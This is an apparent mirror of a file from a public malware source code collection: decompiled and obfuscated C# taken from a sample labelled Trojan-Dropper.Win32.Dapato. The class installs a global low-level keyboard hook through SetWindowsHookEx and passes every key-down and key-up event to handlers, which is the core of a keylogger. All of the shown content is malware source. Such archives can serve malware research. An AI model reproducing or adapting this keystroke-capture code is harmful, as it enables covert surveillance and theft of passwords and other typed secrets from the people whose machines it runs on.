mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
130 lines
7.2 KiB
C#
130 lines
7.2 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: 辺帒껨ℽᰯ☍ム
|
|||
|
|
// Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe
|
|||
|
|
|
|||
|
|
using System;
|
|||
|
|
using System.Runtime.InteropServices;
|
|||
|
|
using System.Windows.Forms;
|
|||
|
|
|
|||
|
|
internal class 辺帒껨ℽ\uF6C2ᰯ\u260Dム
|
|||
|
|
{
|
|||
|
|
private const int 聪ዶ锯棧軅ꘚ塃掑 = 13;
|
|||
|
|
private const int \uEA6A嗣\uEEB8\uEFAD\u2379쾽\u1CB0᷑ = 0;
|
|||
|
|
private const int 觱䎺忓봸\u3297唗筈育 = 256;
|
|||
|
|
private const int 틀톞鴴\u05CC\uE775ဍ\u329C\uE5B5 = 257;
|
|||
|
|
private const int \u08DE낍\uFDE0鑷踪뢊ᆞᚾ = 260;
|
|||
|
|
private const int 퍽ু騜頟\uF069㤡恵Ά = 261;
|
|||
|
|
private 辺帒껨ℽ\uF6C2ᰯ\u260Dム.\uFFFD\uF897ֽ䈶鞕锲歀呖 ꚣ瀕粬퐊Џ웹\uECC0\uE1C1;
|
|||
|
|
private IntPtr \uFFFD능ﳇ\u240E賹홝Л뻹;
|
|||
|
|
|
|||
|
|
[DllImport("User32.dll", EntryPoint = "SetWindowsHookEx", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
|
|||
|
|
private static extern int ᛝᮯ죄ჷ箉䖯ᬆ坁(
|
|||
|
|
int _param0,
|
|||
|
|
辺帒껨ℽ\uF6C2ᰯ\u260Dム.\uFFFD\uF897ֽ䈶鞕锲歀呖 _param1,
|
|||
|
|
IntPtr _param2,
|
|||
|
|
int ὲ扳鯠Ⰼ颵ꤔ깧癸);
|
|||
|
|
|
|||
|
|
[DllImport("User32.dll", EntryPoint = "CallNextHookEx", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
|
|||
|
|
private static extern int ㄖ㥼曻\u0DC9쓴鸁슱鯬(
|
|||
|
|
int _param0,
|
|||
|
|
int _param1,
|
|||
|
|
IntPtr ὲ扳鯠Ⰼ颵ꤔ깧癸,
|
|||
|
|
IntPtr _param3);
|
|||
|
|
|
|||
|
|
[DllImport("User32.dll", EntryPoint = "UnhookWindowsHookEx", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
|
|||
|
|
private static extern bool 떦꺬멦\u2655ມ䪰셀\uF684(int _param0);
|
|||
|
|
|
|||
|
|
public static event 辺帒껨ℽ\uF6C2ᰯ\u260Dム.\uE058謦悒塱ಯ\uF1A8θᢶ 촒뉾럘灞磙ฦ鑘䛥;
|
|||
|
|
|
|||
|
|
public static event 辺帒껨ℽ\uF6C2ᰯ\u260Dム.㕘씫襼䂎̓뎩\uE639\uED88 \uED02铻\u087E縭镚㬌\uF7D3յ;
|
|||
|
|
|
|||
|
|
private int 旮괺௫\u240E哘\u2ED2\u23DB\uE9AB(int _param1, IntPtr ὲ扳鯠Ⰼ颵ꤔ깧癸, IntPtr _param3)
|
|||
|
|
{
|
|||
|
|
if (_param1 == 0)
|
|||
|
|
goto label_7;
|
|||
|
|
label_3:
|
|||
|
|
return 囖㑃뺽뇠ﮀ\uF6FB\uF73E腘.\uF723ᴲ\u1CACﶧ溰齪倜扈(浤솑\uFFFD켅ᇛ\u00A6닂鳧.伲霏\u2260㼄㵖劆ἄⅆ(IntPtr.Zero), _param1, ὲ扳鯠Ⰼ颵ꤔ깧癸, _param3);
|
|||
|
|
label_7:
|
|||
|
|
IntPtr num = ὲ扳鯠Ⰼ颵ꤔ깧癸;
|
|||
|
|
辺帒껨ℽ\uF6C2ᰯ\u260Dム.ꢨਘ掭ﷃⅢ斷墜䎋 ꢨਘ掭ﷃⅲ斷墜䎋1;
|
|||
|
|
辺帒껨ℽ\uF6C2ᰯ\u260Dム.ꢨਘ掭ﷃⅢ斷墜䎋 ꢨਘ掭ﷃⅲ斷墜䎋2;
|
|||
|
|
if (쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(num, \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(256)) || 쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(num, \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(260)))
|
|||
|
|
{
|
|||
|
|
辺帒껨ℽ\uF6C2ᰯ\u260Dム.\uE058謦悒塱ಯ\uF1A8θᢶ 貵譑摩ꉮ띮짅풿 = 辺帒껨ℽ\uF6C2ᰯ\u260Dム.貵譑摩ꉮ띮짅풿\uEDD6;
|
|||
|
|
if (貵譑摩ꉮ띮짅풿 != null)
|
|||
|
|
{
|
|||
|
|
辺帒껨ℽ\uF6C2ᰯ\u260Dム.\uE058謦悒塱ಯ\uF1A8θᢶ 謦悒塱ಯΘᢶ = 貵譑摩ꉮ띮짅풿;
|
|||
|
|
object obj = \uFFFD溦䓞콺ᕿٻ猶呶.晼驿㸙\u2FED瑲\u066C\uEFE1胧(_param3, ᆔኾꗘ몇砍섕뢅\u32D0.\uE12E\uF423ꍨ脱\uFFFD쇧\uFE5E\uE31D((object) ꢨਘ掭ﷃⅲ斷墜䎋2));
|
|||
|
|
int 顣飛旳䣕굧괠 = checked ((int) (unchecked (obj != null) ? (辺帒껨ℽ\uF6C2ᰯ\u260Dム.ꢨਘ掭ﷃⅢ斷墜䎋) obj : ꢨਘ掭ﷃⅲ斷墜䎋1).\uEFFE顣飛旳\u274C䣕굧괠);
|
|||
|
|
늝鑹ೠ\u2A0D㷉\uE6C2녌\uECE7.\uE197㿵婡憙ᝢ逤궙\u17EA((object) 謦悒塱ಯΘᢶ, (Keys) 顣飛旳䣕굧괠);
|
|||
|
|
goto label_3;
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
goto label_3;
|
|||
|
|
}
|
|||
|
|
else if (쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(num, \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(257)) || 쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(num, \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(261)))
|
|||
|
|
{
|
|||
|
|
辺帒껨ℽ\uF6C2ᰯ\u260Dム.㕘씫襼䂎̓뎩\uE639\uED88 陖ꖲ蜠咾ᎃ = 辺帒껨ℽ\uF6C2ᰯ\u260Dム.陖\uE51Cꖲ\uE27C\u28A5蜠咾ᎃ;
|
|||
|
|
if (陖ꖲ蜠咾ᎃ != null)
|
|||
|
|
{
|
|||
|
|
辺帒껨ℽ\uF6C2ᰯ\u260Dム.㕘씫襼䂎̓뎩\uE639\uED88 㕘씫襼䂎̓뎩 = 陖ꖲ蜠咾ᎃ;
|
|||
|
|
object obj = \uFFFD溦䓞콺ᕿٻ猶呶.晼驿㸙\u2FED瑲\u066C\uEFE1胧(_param3, ᆔኾꗘ몇砍섕뢅\u32D0.\uE12E\uF423ꍨ脱\uFFFD쇧\uFE5E\uE31D((object) ꢨਘ掭ﷃⅲ斷墜䎋2));
|
|||
|
|
int 顣飛旳䣕굧괠 = checked ((int) (unchecked (obj != null) ? (辺帒껨ℽ\uF6C2ᰯ\u260Dム.ꢨਘ掭ﷃⅢ斷墜䎋) obj : ꢨਘ掭ﷃⅲ斷墜䎋1).\uEFFE顣飛旳\u274C䣕굧괠);
|
|||
|
|
魉\uEAF1\uE63CŒ櫩\uFB0A\uE1ABഐ.仨䂪얫䶓\u2EC8녔ꆪ녫((object) 㕘씫襼䂎̓뎩, (Keys) 顣飛旳䣕굧괠);
|
|||
|
|
goto label_3;
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
goto label_3;
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
goto label_3;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public 辺帒껨ℽ\uF6C2ᰯ\u260Dム()
|
|||
|
|
{
|
|||
|
|
this.ꚣ瀕粬퐊Џ웹\uECC0\uE1C1 = new 辺帒껨ℽ\uF6C2ᰯ\u260Dム.\uFFFD\uF897ֽ䈶鞕锲歀呖(this.旮괺௫\u240E哘\u2ED2\u23DB\uE9AB);
|
|||
|
|
this.\uFFFD능ﳇ\u240E賹홝Л뻹 = IntPtr.Zero;
|
|||
|
|
this.\uFFFD능ﳇ\u240E賹홝Л뻹 = \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(涸객\uE125점墈Ƹ퍬낵.\uFFFDꒄ빬ީ뺫簂\uEF9F퍬(13, this.ꚣ瀕粬퐊Џ웹\uECC0\uE1C1, \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(㞨冈爁\uF331罜\uF6F3䂻䠻.堠逑獹ꥷআᖀⰸꏦ(Գ䢽\u1CA5\u0608\uE96Dꨥ\u9FEAઉ.옙﨣\u09C6荪鑸딇粨\u204F((object) \u20FB\uAB1D\u3228燽\u2B8Aꭎⱘ녧.\uEA74먪珢遊샲Ⴎ\u0FD9\uF809())[0]).ToInt32()), 0));
|
|||
|
|
if (쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(this.\uFFFD능ﳇ\u240E賹홝Л뻹, IntPtr.Zero))
|
|||
|
|
throw \u26FC諵㪟ꌀ\uFFFD닅\uEE89\u25F6.渒怫虑ᨢ\u273D㑰칗뒹((string) \u003CModule\u003E.\uFFFD\uFFFD\u001E\u0026\uFFFD\uFFFD\uFFFD\uFFFD\uFFFD\uFFFD\uFFFDoP\u000C\uFFFD\u0023(3739141360U));
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
~辺帒껨ℽ\uF6C2ᰯ\u260Dム()
|
|||
|
|
{
|
|||
|
|
if (!쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(this.\uFFFD능ﳇ\u240E賹홝Л뻹, IntPtr.Zero))
|
|||
|
|
goto label_2;
|
|||
|
|
label_1:
|
|||
|
|
꿲\u2611툹쥦ˣꔭ\u246D慞.\u28E7乼ꕲ醴䗄䐠ⲱ돩((object) this);
|
|||
|
|
return;
|
|||
|
|
label_2:
|
|||
|
|
昞ꗤ\uE388ﵵ醍๔곞苦.봤ꊯἳ죉凿\uFFFDᙹǒ(浤솑\uFFFD켅ᇛ\u00A6닂鳧.伲霏\u2260㼄㵖劆ἄⅆ(this.\uFFFD능ﳇ\u240E賹홝Л뻹));
|
|||
|
|
goto label_1;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private struct ꢨਘ掭ﷃⅢ斷墜䎋
|
|||
|
|
{
|
|||
|
|
public uint \uEFFE顣飛旳\u274C䣕굧괠;
|
|||
|
|
public uint ꦑ쯬贕〯\u2FEA둱\uE7B2誅;
|
|||
|
|
public 辺帒껨ℽ\uF6C2ᰯ\u260Dム.㓿臭㘚혶\uF7B4暸簮羍 鼃澵\uABFD\uFFFD\uFBCF\u28B5\u2A63寒;
|
|||
|
|
public uint \u104CẆʭ跒㝀灮陋Ζ;
|
|||
|
|
public UIntPtr \u2586\u2F0B빁쏧ង塹荚顄;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[Flags]
|
|||
|
|
private enum 㓿臭㘚혶\uF7B4暸簮羍 : uint
|
|||
|
|
{
|
|||
|
|
LLKHF_EXTENDED = 1,
|
|||
|
|
LLKHF_INJECTED = 16, // 0x00000010
|
|||
|
|
LLKHF_ALTDOWN = 32, // 0x00000020
|
|||
|
|
LLKHF_UP = 128, // 0x00000080
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public delegate void \uE058謦悒塱ಯ\uF1A8θᢶ(Keys Key);
|
|||
|
|
|
|||
|
|
public delegate void 㕘씫襼䂎̓뎩\uE639\uED88(Keys Key);
|
|||
|
|
|
|||
|
|
private delegate int \uFFFD\uF897ֽ䈶鞕锲歀呖(int nCode, IntPtr wParam, IntPtr lParam);
|
|||
|
|
}
|